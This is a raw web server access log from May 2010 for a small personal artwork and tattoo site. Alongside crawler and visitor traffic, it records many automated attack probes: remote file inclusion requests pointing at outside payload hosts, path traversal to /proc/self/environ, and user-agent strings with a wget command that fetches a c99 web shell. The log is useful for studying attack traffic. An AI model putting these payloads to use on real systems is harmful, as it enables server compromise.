174.121.158.187 - - [08/May/2010:12:20:52 -0500] "GET /logs/access_log.1262649600//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fitzmartyn.co.uk/blog/ipays/id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:12:21:33 -0500] "GET /logs/home.php?action=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:12:21:33 -0500] "GET /home.php?action=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:12:21:33 -0500] "GET /logs/access_log.1213833600%20%20/home.php?action=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [08/May/2010:12:22:57 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.65.40 - - [08/May/2010:12:23:07 -0500] "GET /costume/?iframe=true&width=100%&height=100% HTTP/1.1" 200 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.129.119.10 - - [08/May/2010:12:24:53 -0500] "GET /logs/access_log.1239062400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [08/May/2010:12:28:56 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [08/May/2010:12:30:22 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:30:22 -0500] "GET /logs/access_log.1264723200//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:30:22 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:30:27 -0500] "GET /logs/access_log.1263772800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:30:30 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:30:30 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:30:30 -0500] "GET /logs/access_log.1264723200//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:30:35 -0500] "GET /logs/access_log.1263772800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:46 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:46 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:46 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:48 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:48 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:48 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:56 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:56 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:30:56 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:32:00 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:32:00 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:32:00 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 347 "-""Mozilla/5.0"
92.240.42.10 - - [08/May/2010:12:32:14 -0500] "GET /logs/index.php?option=com_fpslideshow&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.240.42.10 - - [08/May/2010:12:32:14 -0500] "GET /index.php?option=com_fpslideshow&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.140.247.10 - - [08/May/2010:12:32:42 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:32:50 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:32:57 -0500] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:32:57 -0500] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:32:57 -0500] "GET /logs/access_log.1248652800//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:33:07 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:33:17 -0500] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:33:17 -0500] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:33:17 -0500] "GET /logs/access_log.1263772800//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:33:30 -0500] "GET /logs/access_log.1264723200//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:12:33:37 -0500] "GET /logs/access_log.1263772800//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:33:39 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 347 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:12:36:36 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Yandex/1.01.001 (compatible; Win16; I)"
99.39.2.249 - - [08/May/2010:12:42:37 -0500] "GET /logs//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:42:37 -0500] "GET //index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:42:37 -0500] "GET /logs/access_log.1270598400%20%20//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:42:50 -0500] "GET //index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:42:50 -0500] "GET /logs//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:42:50 -0500] "GET /logs/access_log.1270598400%20%20//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:42:51 -0500] "GET /logs/access_log.1272067200%20%20//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:43:05 -0500] "GET /logs/access_log.1272067200%20%20//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:43:07 -0500] "GET /logs//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:43:12 -0500] "GET /logs/access_log.1270598400%20%20//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:43:12 -0500] "GET //index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:43:14 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 345 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:12:43:18 -0500] "GET /logs/access_log.1272067200%20%20//index.php?file=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:43:39 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:44:15 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 345 "-""Mozilla/5.0"
89.123.38.246 - - [08/May/2010:12:44:48 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_04"
62.140.247.10 - - [08/May/2010:12:44:54 -0500] "GET /logs/access_log.1272067200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:45:47 -0500] "GET /logs/access_log.1272067200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.140.247.10 - - [08/May/2010:12:45:56 -0500] "GET /logs/access_log.1272067200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://articlesreruns.com/images/id.gif? HTTP/1.1" 404 345 "-""Mozilla/5.0"
207.46.204.178 - - [08/May/2010:12:48:51 -0500] "GET /logs/access_log.1251763200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:12:50:20 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.231 - - [08/May/2010:12:50:50 -0500] "GET /logs/access_log.1226966400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.251.10.117 - - [08/May/2010:12:55:12 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [08/May/2010:12:55:12 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [08/May/2010:12:57:25 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [08/May/2010:12:57:25 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [08/May/2010:12:59:02 -0500] "GET /logs/access_log.1271289600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.130 - - [08/May/2010:13:00:53 -0500] "GET /logs/access_log.1234483200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.54.187.53 - - [08/May/2010:13:01:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
67.195.112.180 - - [08/May/2010:13:02:19 -0500] "GET /logs/access_log.1160006400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [08/May/2010:13:03:12 -0500] "GET /logs/access_log.1164240000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:13:03:40 -0500] "GET /artwork/toys.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
218.38.34.19 - - [08/May/2010:13:06:19 -0500] "GET /logs/access_log.1262736000//skin/ggambo6210_board/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.38.34.19 - - [08/May/2010:13:06:19 -0500] "GET /logs//skin/ggambo6210_board/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [08/May/2010:13:06:19 -0500] "GET //skin/ggambo6210_board/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:13:09:13 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:13:15:42 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:13:21:16 -0500] "GET /logs/access_log.1271980800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
75.63.6.22 - - [08/May/2010:13:24:52 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=en&start=13&sig2=bemHJckKFuHMcsHsKXxndQ&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbobby%2Bshaw%2Btattoos%26um%3D1%26hl%3Den%26rls%3Dcom.microsoft:*:IE-SearchBox%26rlz%3D1I7ADBF_en%26tbs%3Disch:1&ei=SazlS-PwGZXgNfWAwYYI""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; App/7.00302; 7889060703)"
75.63.6.22 - - [08/May/2010:13:24:52 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; App/7.00302; 7889060703)"
87.250.255.243 - - [08/May/2010:13:28:41 -0500] "GET /logs/access_log.1272326400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:13:37:13 -0500] "GET /logs/access_log.1271721600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.79.5.186 - - [08/May/2010:13:40:37 -0500] "GET /artwork/motto-chair-stitch3.jpg HTTP/1.1" 200 30810 "-""-"
67.79.5.186 - - [08/May/2010:13:41:23 -0500] "GET /artwork/motto-chair-waste3.jpg HTTP/1.1" 200 32078 "-""-"
87.250.255.243 - - [08/May/2010:13:43:07 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
74.81.84.11 - - [08/May/2010:13:46:36 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.81.84.11 - - [08/May/2010:13:46:36 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""wget http://marketlink.uk.net/img/.log/c99 -O /tmp/shell1472"
74.81.84.11 - - [08/May/2010:13:46:40 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.81.84.11 - - [08/May/2010:13:46:41 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""wget http://marketlink.uk.net/img/.log/c99 -O /tmp/shell1364"
74.81.84.11 - - [08/May/2010:13:46:45 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.81.84.11 - - [08/May/2010:13:46:45 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""wget http://marketlink.uk.net/img/.log/c99 -O /tmp/shell1318"
87.250.255.243 - - [08/May/2010:13:49:01 -0500] "GET /artwork/playhouse.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [08/May/2010:13:52:45 -0500] "GET /logs/access_log.1236816000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:13:54:54 -0500] "GET /logs/access_log.1272758400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
99.39.2.249 - - [08/May/2010:13:56:19 -0500] "GET /logs/index.php?option=com_mosres&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
99.39.2.249 - - [08/May/2010:13:56:19 -0500] "GET /logs/index.php?option=com_mosres&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
99.39.2.249 - - [08/May/2010:13:56:20 -0500] "GET /index.php?option=com_mosres&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
99.39.2.249 - - [08/May/2010:13:56:20 -0500] "GET /index.php?option=com_mosres&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [08/May/2010:13:58:43 -0500] "GET /logs/access_log.1157068800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.189 - - [08/May/2010:14:00:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:14:02:49 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.47 - - [08/May/2010:14:04:50 -0500] "GET /logs/access_log.1188345600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:14:07:33 -0500] "GET /artwork/mirrors.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.40 - - [08/May/2010:14:09:09 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 200 3315 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.42 - - [08/May/2010:14:12:57 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
213.189.224.16 - - [08/May/2010:14:13:26 -0500] "GET /logs/http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 357 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.189.224.16 - - [08/May/2010:14:13:26 -0500] "GET /http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.250.255.243 - - [08/May/2010:14:13:33 -0500] "GET /logs/access_log.1271808000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.47 - - [08/May/2010:14:13:51 -0500] "GET /logs/access_log.1232928000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.189.224.16 - - [08/May/2010:14:19:29 -0500] "GET /includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.189.224.16 - - [08/May/2010:14:19:29 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
207.46.204.242 - - [08/May/2010:14:20:51 -0500] "GET /logs/access_log.1244073600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:14:21:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [08/May/2010:14:26:40 -0500] "GET /logs/access_log.1242518400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.218.116.163 - - [08/May/2010:14:26:43 -0500] "GET /logs/access_log.1216944000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [08/May/2010:14:28:34 -0500] "GET /logs/access_log.1270684800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
84.249.100.246 - - [08/May/2010:14:32:42 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.fi/search?source=ig&hl=fi&rlz=1G1GGLQ_FIFI310&=&q=bert+grimm+flash&meta=lr%3D&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:32:43 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:32:43 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:32:43 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:32:43 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:32:44 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:32:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:32:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:19 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:19 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
